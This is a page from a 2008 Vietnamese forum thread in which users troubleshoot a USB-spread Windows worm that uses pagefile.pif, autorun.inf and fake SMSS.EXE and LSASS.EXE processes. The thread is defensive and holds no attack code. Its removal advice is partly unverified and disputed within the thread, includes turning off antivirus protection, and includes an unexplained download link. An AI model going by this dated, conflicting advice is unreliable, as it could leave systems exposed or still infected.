banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... pagefile.pif, LSASS.EXE, SMSS.EXE  XML
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 29/01/2008 14:40:21 (+0700) | #121 | 112752
co0l.l0ve
Member

[Minus]    0    [Plus]
Joined: 16/10/2007 20:57:13
Messages: 50
Offline
[Profile] [PM]
Em nhức hết cả đầu vì con này.Vì cài lại thì khi sờ đến dữ liệu ổ khác nó lại lây sang. Hôm trước em đàng cho ẩn ổ dữ liệu đi.Cài lại Win làm một ổ trống tạm để lưu dữ liệu. Còn cái đống dữ liệu kia để nghiên cứu các cách diệt của các bác xong diệt sau.Các bác bảo em làm thế có được không?Thanks
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 30/01/2008 23:57:07 (+0700) | #122 | 112973
[Avatar]
kamankily
Member

[Minus]    0    [Plus]
Joined: 26/06/2006 01:29:47
Messages: 41
Offline
[Profile] [PM]
con này nó biến thể,dùng local security ko được rùi
http://www.4shared.com/file/36363993/e0de4930/nguyhiem_virus.html
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 25/02/2008 13:42:33 (+0700) | #123 | 116526
xmagicz
Member

[Minus]    0    [Plus]
Joined: 22/10/2007 02:40:42
Messages: 1
Offline
[Profile] [PM]

pupi wrote:
Mình cũng bị dính con này! ko vào được safemode, không cài được một số phần mềm diệt víu nhứ KAV hay BIT kể cả Norton...
Cái Fasthelper nhận ra nhưng cũng không kill được nhóc này! cho dù mình đã làm theo hướng dẫn trên.
Mình thấy đơn giản nhất để diệt con này là ra tiệm mua cái đĩa Hiren hoặc bạn nào có rồi thì chiến luôn(có thể làm boot từ USB cũng được)
Bạn vào Dos gõ VC hoặc chạy chương trình Volko j đó trong phần File manager trong hiren
Tiếp theo là F8(Deletè File) những file sau:
Autorun.inf , pagefile.pif , smss.exe trực thuộc tại các ổ đĩa.
Vào trong c:\windows\system32\Com Delete nốt mấy file Lass.exe , smss.exe
Vào docment & Setting rồi vào all user trong startup xóa nốt mất chú ~.exe
Xong bạn có thể thở phào! Vào win và ko thấy chúng trong starup nữa!
Vào Registry xóa và chỉnh suẳ nốt mấy key như hướng dẫn phía trên!
Nếu bạn ko muốn chọc ngoáy thì cho đĩa win vào repair là ok liền!
Chúc bạn kill mấy nhóc này thành công!
Em mới tham gia diễn đàn trình độ còn kém mong các bác chỉ giáo! thanks! 


Em làm y như bác nói , nhưng ko hiểu sao trong system32 của em lại ko có foder Com ? Hic hic ! Bi h máy em còn dính thêm con ko cho logon nữa , log vào là bị log off luôn , đang cài lại win ! Hic hic !
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 04/03/2008 03:30:55 (+0700) | #124 | 117746
vuthien
Member

[Minus]    0    [Plus]
Joined: 06/02/2007 23:02:50
Messages: 3
Offline
[Profile] [PM]
Chào Các Bạn, tôi cũng bị dính con này, nhưng chắc là biến thể mới nên nó phá luôn mục local security policies (không sử dụng cách của Bạn Ghost Member được).
Có dùng đĩa hirren boot vào dos để xóa hết các file autorun.inf, pagefile.pif ở các ổ logic. các file smss.exe, Lass.exe, một số file bắt đầu bằng chữ số ... exe/dll .... Vào tất cả các user xóa các file thực thi trong start menu. Cũng không được
Tải Fire-lion đã cập nhật data về thì chỉ chạy được 5s là treo, sau đó không thể sử dụng được, BKAV bản cập nhật 01/3/2008 về quét thì báo khoảng 500 file bị nhiễm và diệt, nhưng luôn luôn còn 2 file smss.exe và Lass.exe, sau đó khởi động vào lại thì vẫn quét ra mấy trăm file bị nhiễm như cũ.
Dùng KAV, BIT, NAV ... cũng không được (không thể cài đặt, sử dụng bản portable thì chỉ bắt đầu quét là treo).
Format ổ C cài win lại (nhưng các ổ khác không format được vì có dữ liệu) nhưng khi cài xong win sử dụng các phần mềm quét virus để quét là lại bị nhiễm ngược.
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 04/03/2008 03:40:10 (+0700) | #125 | 117747
mrpinochio
Member

[Minus]    0    [Plus]
Joined: 13/04/2007 18:03:13
Messages: 9
Offline
[Profile] [PM]

vuthien wrote:
Chào Các Bạn, tôi cũng bị dính con này, nhưng chắc là biến thể mới nên nó phá luôn mục local security policies (không sử dụng cách của Bạn Ghost Member được).
Có dùng đĩa hirren boot vào dos để xóa hết các file autorun.inf, pagefile.pif ở các ổ logic. các file smss.exe, Lass.exe, một số file bắt đầu bằng chữ số ... exe/dll .... Vào tất cả các user xóa các file thực thi trong start menu. Cũng không được
Tải Fire-lion đã cập nhật data về thì chỉ chạy được 5s là treo, sau đó không thể sử dụng được, BKAV bản cập nhật 01/3/2008 về quét thì báo khoảng 500 file bị nhiễm và diệt, nhưng luôn luôn còn 2 file smss.exe và Lass.exe, sau đó khởi động vào lại thì vẫn quét ra mấy trăm file bị nhiễm như cũ.
Dùng KAV, BIT, NAV ... cũng không được (không thể cài đặt, sử dụng bản portable thì chỉ bắt đầu quét là treo).
Format ổ C cài win lại (nhưng các ổ khác không format được vì có dữ liệu) nhưng khi cài xong win sử dụng các phần mềm quét virus để quét là lại bị nhiễm ngược. 

Hic bác này bị giống em rồi.
Áp dụng tất cả các cách hướng dẫn ở trên đều không được.
Có bác nào cao tay giúp đỡ cái.
[Up] [Print Copy]
  [Question]   Re:pagefile.pif, LSASS.EXE, SMSS.EXE 04/03/2008 06:29:49 (+0700) | #126 | 117786
NGVANTEO
Member

[Minus]    0    [Plus]
Joined: 21/12/2007 01:50:32
Messages: 5
Offline
[Profile] [PM]
Hien nay co chuong trinh Combo Fix rat hay co the giup diet nhanh gon con virus nay, toi post len cho moi nguoi tham khao...


Tai chuong trinh ComboFix tu http://download.bleepingcomputer.com/sUBs/ComboFix.exe hoac http://subs.geekstogo.com/ComboFix.exe vao Desktop

Copy doan code duoi day vao notepad va save thanh file CFScript.txt tai [b]Desktop[/b] (chu y ten file la CFScript.txt va save tai Desktop)

c:\windows\SYSTEM32\COM\SMSS.EXE
c:\windows\SYSTEM32\COM\LSASS.EXE
c:\windows\SYSTEM32\COM\NETCFG.DLL
c:\windows\SYSTEM32\COM\NETCFG.000


1. Don dep cac file tam tren may tinh bang chuong trinh CCleaner http://majorgeeks.com/download4191.html
2. Tat het cac chuong trinh Antivirus va AntiSpyware dang chay thuong thu tren may tinh
3. Nhap chuot trai vao file CFScript.txt keo vao file Combofix.exe tren Desktop roi tha chuot ra
- Chuong trinh comfix se tu dong chay ra restare may tinh ( khoang 5 den 10 phut)
- Chu Y khong duoc lam gi ca khi Combo fix dang chay, neu no co yeu cau gi chi viec ok
- Sau khi may khoi dong lai Combo fix se cho mot bang log ket qua
4. vao Start - Run va dan doan nay vao "%userprofile%\desktop\combofix.exe" /u
Enter de chay, Combo se tu dong loai khoi may tinh

Sau 1-4 thi Lsass, Sass, pagepif .... se bi knock out , tuy nhien se van con mot so file file exe,cfg... bi nhiem, nen phai cai mot chuong trinh antivirus de scan, co the dung mot trong hai truong trinh free sau
1. Avast http://www.majorgeeks.com/download1968.html
2. PC tools Antivirus http://www.majorgeeks.com/PC_Tools_AntiVirus_Free_Edition_d5469.html

Chu y nhat nho cap nhat truoc khi scan, khi phat hien em nao cu diet thang tay.
Sau do restart lai may.

[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 04/03/2008 07:10:45 (+0700) | #127 | 117798
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Các bước được chắp vá lung tung và không logic tí nào bạn gì đó ơi. Bạn cung cấp cho cái link tiếng Anh tiện cho anh em theo dỏi đi.
Tui thấy ở forum Majogreek như thế này:
http://forums.majorgeeks.com/showthread.php?p=1115940

Your logs in post 16 show that the files I asked you to delete using Combofix didn't delete. It looks from your Combofix log like you didn't make up the txt file and pull it across to the Combofix icon on the desktop. In order for this to work, Combofix must be installed on the desktop, you must make a notepad file as per the instructions which is stored on the desktop and then that notepad file will be dragged across the desktop on top of the comfofix icon. I will repeat the instructions in detail. Please see if it works this time.

Please try and remove these files as follows:

* Make sure that combofix.exe that you downloaded while doing the READ & RUN ME is on your Desktop but Do not run it!
o If it is not on your Desktop, the below will not work.
* Open Notepad and copy/paste the text in the below code box into it:

Code:

Driver::
vsbabfsi

Files::
C:\WINDOWS\system32\drivers\vsbabfsi.sys
C:\uyguxbpt.bat
C:\yhpkihtq.bat

* Save the above as CFscript.txt and make sure you save it to the same location (should be on your Desktop) as ComboFix.exe
* At this point, you MUST EXIT ALL BROWSERS NOW before continuing!
* You should have both the ComboFix.exe and CFScript.txt icons on your Desktop.
* Now use your mouse to drag CFscript.txt on top of ComboFix.exe
* Follow the prompts.
* When it finishes, a log will be produced named c:\combofix.txt
* I will ask for this log below

Note:

Do not mouseclick combofix's window while it is running. That may cause it to stall.

Now run Ccleaner!

Now run the C:\MGtools\GetLogs.bat file by double clicking on it.

Then attach the below logs:

* C:\ComboFix.txt
* C:\MGlogs.zip

Make sure you tell me how things are working now! 


Nó hơi giống giống post tiếng Việt không dấu của bạn.

Còn đầy là ở BeepingComputer.
http://www.bleepingcomputer.com/forums/topic109792.html

I (as well as MicroSoft, McAfee and Symantec) recommend that you DO NOT have more than one anti virus product installed and running on your computer at a time.

The reason for this is that if both products have their automatic (Real-Time) protection switched on, then those products which do not encrypt the virus strings within them can cause other anti virus products to cause "false alarms".

It can also lead to a clash as both products fight for access to files which are opened again this is the resident/automatic protection.

In general terms, the two programs may conflict and cause:

1) False Alarms: When the anti virus software tells you that your PC has a virus when it actually doesn't.
2) System Performance Problems: Your system may lock up due to both products attempting to access the same file at the same time.

Therefore please go to add/remove in the control panel and remove one of these:
.
BitDefeneder Antivirus or AVG antivirus

Do you have Symentec/Norton Antivirus installed also? If so, you need to remove it so that you will be running only one Antivirus program.

************************

Let's look in a different place for signs.

Open HijackThis 2.0.2
Press the button 'View Misc Tools Section'
Press the button 'open uninstall manager'
Press the button 'save list'
A notepad file will open.
Post the content here in your reply.
Close HijackThis.

************************

If you have used Combofix before, please delete the version you are having and redownload it again, because Combofix is being updated everyday.

If your Antivirus or any other realtime scanner is displaying an alert after you downloaded Combofix or while you use Combofix, please disable your scanner and redownload Combofix again. Because some scanners may see some combofix related components as suspicious and block or delete them while there's nothing wrong with them.


1. Download this file - combofix.exe to your Desktop.
Note:
It is important that it is saved directly to your desktop
2. Double click combofix.exe & follow the prompts.
3. When finished, it shall produce a log for you, C:\ComboFix.txt. Post the ComboFix log and a fresh Hijackthis log in your next reply.
Do NOT post the ComboFix-quarantined-files.txt - unless I ask you to.

Note:
Do not mouseclick combofix's window while it's running. That may cause it to stall
If you have Norton Antivirus installed then disable script blocking so it will not interfere with the fix.

To disable Norton Script blocking Service:

* Disable the Script Blocking Service:
To open Services, click Start, point to Settings, and then click Control Panel.
Double-click Administrative Tools, and then double-click Services.
Find ScriptBlocking services, Right-click the service, and then click and then click Properties.
On the General tab, under Startup, click Disabled.
Under Service Status, click Stop button. Click Apply button.

* Disable the Script Blocking In Norton Settings:
Start Norton Antivirus.
Click Options. If a menu appears when you click Options, then click Norton Antivirus. The Norton Antivirus Options dialog box appears.
Click Script Blocking.
Uncheck Enable Script Blocking (recommended).
Click OK
You can reenable it afterwards when everything is clean again.
 

Cũng có thông tin hơi giống giống post tiếng Việt không dấu của bạn.

3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]
  [Question]   Re:pagefile.pif, LSASS.EXE, SMSS.EXE 04/03/2008 20:33:01 (+0700) | #128 | 117863
NGVANTEO
Member

[Minus]    0    [Plus]
Joined: 21/12/2007 01:50:32
Messages: 5
Offline
[Profile] [PM]
Xin chao ban tmd Elite Member (da post rat nhieu bai > 1300 ???) , tmd co that su hieu ve combo fix khong, dung nen xem qua bai viet noi lung tung nhe, de nghi tmd vao forum whatthetech de nghien cuc va biet ki hon cach diet virus rat hay nay. Con doi voi cach diet o tren minh da thu tren rat nhieu may va deu thanh cong...
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 04/03/2008 23:05:36 (+0700) | #129 | 117868
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Cách gì chứ cách chắp vá các hướng dẫn, không trích dẫn nguyên gốc từ nguồn, không phân tích rõ tại sao->thảm họa cho những ai không hiểu "tại sao phải làm như vậy".
Hai trích dẫn tiếng Anh trên kia là những gì mà những người ở hai diễn đàn đó đề nghị người khác làm, có phân tích, có đề nghị. Và tui thấy những gì ở khoản tiếng Miên(sau khi dùng từ điển tiếng Việt trong đầu tui dịch ngược sang tiếng Việt) của bạn rất giống 2 trích dẫn trên.

Tiếp theo là viết chữ Miên lai Việt như trên, có trời mới hiểu được, còn không bạn phải biết tiếng Miên lai Việt. Làm ơn đọc cho kỹ những gì người khác post.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 06/03/2008 21:57:11 (+0700) | #130 | 118154
[Avatar]
thephatcompany
Member

[Minus]    0    [Plus]
Joined: 27/02/2008 15:13:47
Messages: 453
Offline
[Profile] [PM] [WWW] [Yahoo!]
Bạn ơi! Cái đó cài lại windows đi bạn! càng làm thấy càng ngu đó, mệt lắm. Đưa ra hướng giải quyết làm rối tung mọi chuyện.
Nghe tui cài lại windows đi, cài nhanh mà! Chúc vui
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 11/03/2008 03:52:58 (+0700) | #131 | 118842
[Avatar]
muahang
Member

[Minus]    0    [Plus]
Joined: 10/03/2008 15:33:21
Messages: 2
Offline
[Profile] [PM] [Yahoo!]

Gà chào Ghost Ship!
Topic của bạn rất hay và nó giúp mọi người có một cách giải quyết con virus!
Tuy nhiên cần đọc gần hết các bài viết và ngồi tổng hợp lại!
Trong registry mình cũng ko có biết khóa nào làm mất checkbox hiện file ẩn hệ thống.
Cũng không biết processxp có chức năng suspend? smilie)

Thực tế BKIS bán BKAV pro chủ yếu cho "Gà" và họ cũng sống khá!
Vậy mong rằng mọi ngừoi làm ra những thứ dễ dùng để "gà" nào cũng dùng được!
Như MOD Hoàng với FH chẳng hạn!
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 11/03/2008 09:33:38 (+0700) | #132 | 118873
nkp
Member

[Minus]    0    [Plus]
Joined: 09/03/2008 13:36:56
Messages: 29
Offline
[Profile] [PM]
Con này mình gặp ở nhiều máy rồi.Mình đã từng rất nhiều phương pháp nhưng không được.Mình chỉ xài cách này thì mới hết virus ở các ổ đĩa.

Các bạn xài Hiren Boot.Sau khi khởi động cùng DOS và vào WIN98 Mini.Cái này ở phần File Manage thì phải.Mình không nhớ rõ.Các bạn vô thử tìm nha.Sorry vì trí nhớ mình dạo này kém quá.Sau khi vô được Win98 các bạn tiến hành format ổ đĩa hệ điều hành.Và sau đó qua các ở đĩa còn lại tìm file pagefile.pif, autorun.inf, smss.exe, lsass.exe và xóa đi.Thế là xong các bạn cài lại hệ điều hành và chương trình.Nếu như bạn muốn sạch virus hơn nữa thì bạn cài chương trình diệt virus cập nhật và quét lại là ok.Mình đã làm như vậy ít nhất là 3 máy và điều thành côngi.Chúc các bạn thành công.
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 11/03/2008 10:19:32 (+0700) | #133 | 118879
[Avatar]
Ghost Ship
Member

[Minus]    0    [Plus]
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
[Profile] [PM]

muahang wrote:
Gà chào Ghost Ship! 

Vâng! GS chào Gà và thưa với Gà là GS cũng là Gà thôi smilie
Topic của bạn rất hay và nó giúp mọi người có một cách giải quyết con virus! 

Cảm ơn bạn có lời khen smilie và mình thấy topic này đã cung cấp khá nhiều cách giải quyết con virus này chứ kô phải 1 cách như bạn nói smilie
Tuy nhiên cần đọc gần hết các bài viết và ngồi tổng hợp lại! 

Mình cũng muốn thế nhưng mà dạo này mình kô có hứng lắm. Mà mình thì kô thích tổng hợp những cái mà mình chưa kiểm tra nên mọi người đành chịu khó đọc rồi thử rồi tự rút ra vậy smilie
Trong registry mình cũng ko có biết khóa nào làm mất checkbox hiện file ẩn hệ thống.
Cũng không biết processxp có chức năng suspend? smilie

Mấu chốt của việc diệt con này là xóa được cái file ~.exe và các file pagefile.pif khi 2 process LSASS.EXE và SMSS.EXE kô hoạt động. mình thấy cái chức năng suspend của procesxp đơn giản thế mà sao kô có ai thử và cho ý kiến nhỉ?

Cách dùng chức năng suspend của processxp để diệt con này:

1. mở Processxp (ai chưa có trong máy thì gõ processxp vào google rồi down về smilie )

2. Tìm đến dòng LSASS.EXE rồi click chuột phải vào cái dòng ấy.

3. Click tiếp vào cái dòng suspend trong menu hiện ra.(để ngừng hoạt động của Process LSASS.EXE nhưng kô làm nó biến mất nhằm lừa cái SMSS.EXE rằng thằng LSASS.EXE vẫn đang hoạt động )

4. Tìm đến dòng SMSS.EXE rồi click chuột phải vào cái dòng ấy rồi chọn cái dòng kill process trong cái menu hiện ra nhằm Kill luôn cái thằng SMSS.EXE. Lúc này cái thằng LSASS.EXE cũng đã bị kill và chỉ còn cái xác khô dựng ở đấy để lừa thằng SMSS.EXE này --> cả 2 thằng đều đã bị kill smilie

5. Bây h thì các bạn tìm đến các file của nó và xóa thôi. các file của nó là file nào và ở đâu thì trong topic này nói quá nhiều rồi. Chú ý kô click dúp để mở ổ khi chưa xóa file pagefile.pif trong ổ.

Đấy là 5 bước vô hiệu sự hoạt động của phần Worm. Việc tiếp theo là diệt và phục hồi phần virus là những file đã bị lây nhiễm trong máy. phần này thì kô nên làm bằng tay mà các bạn nên down một AV đã update con này để quét toàn bộ các ổ. (BKAV làm việc này rất tốt)

Cuối cùng là phục hồi mấy chức năng của win bị con này phá. (nếu bạn kô dùng đến mấy chức năng này thì chả cần khôi phục cũng được smilie) Phần này thì lấy file .bat của pác NGVANTEO là ok. Riêng cái local security thì hình như chưa có cách phục hồi mà mình cũng kô biết nó bị phá thé nào. chưa thử phiên bản mới của nó smilie
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 12/03/2008 10:59:04 (+0700) | #134 | 119042
[Avatar]
kamankily
Member

[Minus]    0    [Plus]
Joined: 26/06/2006 01:29:47
Messages: 41
Offline
[Profile] [PM]
đây nè bạn
http://www.4shared.com/file/36363993/e0de4930/nguyhiem_virus.html
smilie
nhìu bạn mình dính con nì,dính 1 cái là chỉ có format toàn bộ (coi hướng dẫn trong đây nó loằng xà boằng smilie ) con này cũng có nhìu kíck cỡ lém smilie
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 13/03/2008 01:51:46 (+0700) | #135 | 119110
[Avatar]
sate
Member

[Minus]    0    [Plus]
Joined: 10/03/2008 13:39:10
Messages: 3
Offline
[Profile] [PM]
Hix smilie, tôi cũng bị con này. Phải nói là con virus này biến đổi muôn hình vạn trạng. Máy ở nhà một loại, máy ở công ty một kiểu... Nhiều lần bực mình quá, tôi cài lại máy, nhưng rồi cũng không biết nhiễm lại lúc nào. Có lẽ là do dữ liệu trên ổ Data, mà nếu virus len lõi chui vào ổ data thì đúng là đại họa khôn lường smilie. Tôi đã dùng KAV và BKAV phòng thủ nhưng không hiệu nghiệm. Còn một cách nữa, tôi tạo một file autorun.inf, bỏ thuộc tính -a, thiết lập read only, với nội dung file như sau: cacls \autorun.inf /D Everyone rồi chép vào tất cả các ổ đĩa. Nhưng vẫn không hiệu quả. Cái tôi bực nhất là Yahoo messenger không vào được, ổ đĩa mở bằng lệnh double click không được. Thua rùi... chẳng lẽ phải sống chung với lũ...??
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 19/03/2008 12:26:56 (+0700) | #136 | 120093
dung_h2
Member

[Minus]    0    [Plus]
Joined: 26/11/2007 20:51:35
Messages: 1
Offline
[Profile] [PM] [WWW] [Yahoo!] [MSN]
mình sửa cái laptop cho bà chị thấy có file autorun.inf trong mọi ổ. Vào xem thì thấy tự động chạy file pagefile.inf, nhưng ko thấy có file nào cả. Bên cạnh đó, laptop này ko vào được Win. Cứ đến dòng chữ Windows XP chạy được vài vạch xanh là máy hiện lên 1 màn hình xanh lè và tự động Restart. Dùng Hiren Boot's thì ko vào được System32\Com. Mình xóa thử file autorun.inf nhưng khi vào lại thì vẫn thấy. Vậy có phải laptop của mình cũng bị dính virus này ko ? Diệt thế nào đây ?
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 19/03/2008 22:01:25 (+0700) | #137 | 120125
nguoi_moi_biet
Member

[Minus]    0    [Plus]
Joined: 31/12/2007 12:32:48
Messages: 29
Offline
[Profile] [PM]
Theo dõi cả chủ đề này tôi thấy những máy có khả năng bị nhiễm là máy xuất hiện các file SMSS, LSASS ở trong processes nhưng đây cũng là các file của Win. Vậy có chúng ta phân biệt như thế nào vậy? Cái nào là của Win cái nào là do Virus tạo ra?
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 23/03/2008 02:25:37 (+0700) | #138 | 120640
[Avatar]
Ghost Ship
Member

[Minus]    0    [Plus]
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
[Profile] [PM]

nguoi_moi_biet wrote:
Theo dõi cả chủ đề này tôi thấy những máy có khả năng bị nhiễm là máy xuất hiện các file SMSS, LSASS ở trong processes nhưng đây cũng là các file của Win. Vậy có chúng ta phân biệt như thế nào vậy? Cái nào là của Win cái nào là do Virus tạo ra? 
Cách phân biệt đã có reply nói rồi nhưng chắc là nhiều reply quá bạn kô thấy nên mình nói lại vậy.

Nếu xem process bằng task manager thì dùng cột User Name để phân biệt. Nếu ở cột User Name ghi SYSTEM thì đó là Process của Win còn nếu kô (là tên account mà bạn đang dùng) thì đó là process của con này.

Nếu xem bằng một tool cho tho hiện path của file (như IceSword, Procexp...) thì phân biệt bằng path. Cái nào có path là C:\WINDOWS\system32\ là của Win còn cái nào có path là C:\WINDOWS\system32\Com thì là con này.

Kinh thật, cái topic này sắp vào top topic có lượt xem nhiều nhất roài smilie
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 23/03/2008 02:55:49 (+0700) | #139 | 120649
[Avatar]
thephatcompany
Member

[Minus]    0    [Plus]
Joined: 27/02/2008 15:13:47
Messages: 453
Offline
[Profile] [PM] [WWW] [Yahoo!]
Nói chung phải repair lại máy hay cài lại đi, thấy rắc rối quá, thảo luận nhức cả đầu
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 24/03/2008 03:12:07 (+0700) | #140 | 120820
[Avatar]
Ghost Ship
Member

[Minus]    0    [Plus]
Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline
[Profile] [PM]

LovesPascal wrote:
Nói chung phải repair lại máy hay cài lại đi, thấy rắc rối quá, thảo luận nhức cả đầu 

Hèm! lúc nào cũng chỉ có 1 câu repair lại máy 2 câu cài lại đi mà topic nào cũng thấy cậu nhẩy zoo smilie cậu muốn thành ngôi sao spam mới chăng? Nếu có tư tưởng như vậy thì cậu vào đọc box virus làm j? box virus mở ra để khuyên người ta cài lại máy khi gặp virus sao?

Cậu có biết nếu kô có mọt chút kiến thức về virus thì dù có cài lại Win thì cũng sẽ nhiễm lại như thường (kô biết diệt autorun.inf và các mầm móng khác trong ổ dữ liệu) Cho dù có format hết cả các ổ dữ liệu thì việc nhiễm lại qua các hoạt động trao đỏi dữ liệu cũng chỉ là thời gian.

Còn cái cách repair lại máy có phải là repair lại win kô bạn? ai nói với bạn là làm thế hết virus vậy? bạn đã bao giờ thử chưa?

Nói thật với bạn là những reply của bạn làm tôi khá là khó chịu đấy. nếu là cách đây mấy tháng thì có lẽ tôi đã dành cho bạn những lời "ngọt ngào" hơn smilie
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 24/03/2008 03:41:23 (+0700) | #141 | 120822
karkar
Member

[Minus]    0    [Plus]
Joined: 12/03/2007 18:22:03
Messages: 18
Offline
[Profile] [PM]

vuthien wrote:
Chào Các Bạn, tôi cũng bị dính con này, nhưng chắc là biến thể mới nên nó phá luôn mục local security policies (không sử dụng cách của Bạn Ghost Member được).
Có dùng đĩa hirren boot vào dos để xóa hết các file autorun.inf, pagefile.pif ở các ổ logic. các file smss.exe, Lass.exe, một số file bắt đầu bằng chữ số ... exe/dll .... Vào tất cả các user xóa các file thực thi trong start menu. Cũng không được
Tải Fire-lion đã cập nhật data về thì chỉ chạy được 5s là treo, sau đó không thể sử dụng được, BKAV bản cập nhật 01/3/2008 về quét thì báo khoảng 500 file bị nhiễm và diệt, nhưng luôn luôn còn 2 file smss.exe và Lass.exe, sau đó khởi động vào lại thì vẫn quét ra mấy trăm file bị nhiễm như cũ.
Dùng KAV, BIT, NAV ... cũng không được (không thể cài đặt, sử dụng bản portable thì chỉ bắt đầu quét là treo).
Format ổ C cài win lại (nhưng các ổ khác không format được vì có dữ liệu) nhưng khi cài xong win sử dụng các phần mềm quét virus để quét là lại bị nhiễm ngược. 



hehe bác cài Win vào ổ C xong lại dùng file setup virus lưu trong ổ dữ liệu (đã bị dính virus trước khi cài lai win) thì bị nhiễm là đương nhiên thôi . cài Win xong bác download phiên bản mới của BKAV về rồi quét là được thôi smilie (nếu nó đã được cập nhật con này smilie) . nếu bác dùng máy ngoài hàng thì phải cẩn thận khi mở USB trên máy mình , đừng có click vào ổ đĩa hay open qua autorun của ổ di động , hãy sử dụng chức năng run của window để vào USB : RUN : "gõ tên ổ đĩa" + dấu ":" smilie
nếu vẫn không được đập máy đi mua cái khác về dùng smilie
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 24/03/2008 03:58:38 (+0700) | #142 | 120823
karkar
Member

[Minus]    0    [Plus]
Joined: 12/03/2007 18:22:03
Messages: 18
Offline
[Profile] [PM]

Ghost Ship wrote:

LovesPascal wrote:


Cậu có biết nếu kô có mọt chút kiến thức về virus thì dù có cài lại Win thì cũng sẽ nhiễm lại như thường (kô biết diệt autorun.inf và các mầm móng khác trong ổ dữ liệu) Cho dù có format hết cả các ổ dữ liệu thì việc nhiễm lại qua các hoạt động trao đỏi dữ liệu cũng chỉ là thời gian.

Còn cái cách repair lại máy có phải là repair lại win kô bạn? ai nói với bạn là làm thế hết virus vậy? bạn đã bao giờ thử chưa?
 

hehe bác chỉ được cái nói đúng smilie nhưng cũng không nên gay gắt như thế chứ smilie bác LovesPascal nói cũng không sai đâu có lẽ bác ấy muôn nói là cài lại win hay repair rồi download chương trình diệt virus về quét lại máy ấy mà ấy mà smilie thế thì máy sao ko hết virus cơ chứ smilie (chỉ hết những loại ta đã biết và bác BKAV hay antivir nào đó đã biết thôi nhé smilie)
để không bị nhiễm lại thì các bác phải cẩn thận khi sử dụng USB khi trao đổi dự liệu là được thôi mà smilie
dạo này không thấy máy bị nhiễm virus sướng quá smilie smilie smilie smilie smilie smilie smilie smilie smilie smilie
nếu bị nhiễm đã có ghost rồi đếch sợ chú nào cả , các chú vô máy anh không chết vì BK cũng tan xác dưới FULL_GHOST của anh smilie smilie smilie smilie smilie smilie smilie smilie smilie smilie smilie
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 24/03/2008 11:14:18 (+0700) | #143 | 120876
[Avatar]
bluearrow
Member

[Minus]    0    [Plus]
Joined: 23/03/2008 22:40:53
Messages: 8
Offline
[Profile] [PM]
Con này có phiên bản mới hay sao á, proceXP (process explorer) không mở được. Vừa khởi động là treo ngay. Hoặc cũng có thể processXP là thằng khác; nhưng tìm trên google thì chỉ có thằng này thôi, processXP thì cho ra kết quả VN, lạ thật!
Đã vào dos xóa các file autorun, filepage (tất cả các phân vùng, 4 thằng ở system32/COM/ và 2 thằng ~xxx.exe với xxx là dãy số bất kỳ rồi mới vào Win vẫn bị như thường
Thằng Lsass.exe còn tự khởi động IE (ẩn) và khởi tạo lệnh ping để liên lạc hòng cập nhật phiên bản mới hơn (lạy trời là em đã rút dây mạng)
Policy đã bị xóa, Dùng regrun backup registry không có tác dụng, không chạy được proceXP nên không kill được hai thằng trong task manager. Em bó tay rồi.
Máy để bàn đã bị nhiễm, chỉ còn mỗi laptop này lướt net nhờ các bạn trợ giúp thôi.

à, xin đính chính chút đỉnh, proceXP không bị treo, mà là lâu kinh dị, mỗi các click chuột tương đương 30' suspend được thằng Lsass.exe, nhưng thằng smss.exe thì không (truy cập bị từ chối). Bên cạnh đó, không biết thế nào mà nó không lây nhiễm tiếp vô USB. Xin cho một lời khuyên!
[Up] [Print Copy]
  [Question]   Re: pagefile.pif, LSASS.EXE, SMSS.EXE 25/03/2008 03:54:43 (+0700) | #144 | 121015
[Avatar]
bluearrow
Member

[Minus]    0    [Plus]
Joined: 23/03/2008 22:40:53
Messages: 8
Offline
